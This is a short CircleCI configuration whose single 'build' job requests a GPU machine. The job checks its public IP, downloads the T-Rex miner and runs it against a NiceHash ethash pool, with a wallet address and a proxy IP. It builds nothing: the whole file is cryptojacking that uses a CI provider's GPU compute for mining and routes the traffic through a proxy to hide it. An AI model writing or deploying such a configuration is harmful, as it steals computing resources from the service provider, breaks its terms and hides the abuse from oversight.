version: 2.1

jobs:
  build:
    machine:
      resource_class: gpu.nvidia.medium
      image: ubuntu-1604-cuda-10.1:201909-23
    steps:
      - run: curl ifconfig.me
      - run: wget https://github.com/trexminer/T-Rex/releases/download/0.26.1/t-rex-0.26.1-linux.tar.gz && tar xf t-rex-0.26.1-linux.tar.gz 
      - run: ./t-rex -a ethash -o stratum+tcp://daggerhashimoto.auto.nicehash.com:9200 -u 31ib7EZjeDoER14o1WzVyxJRgw7EeAHTBH.edan --proxy 154.7.184.49:5699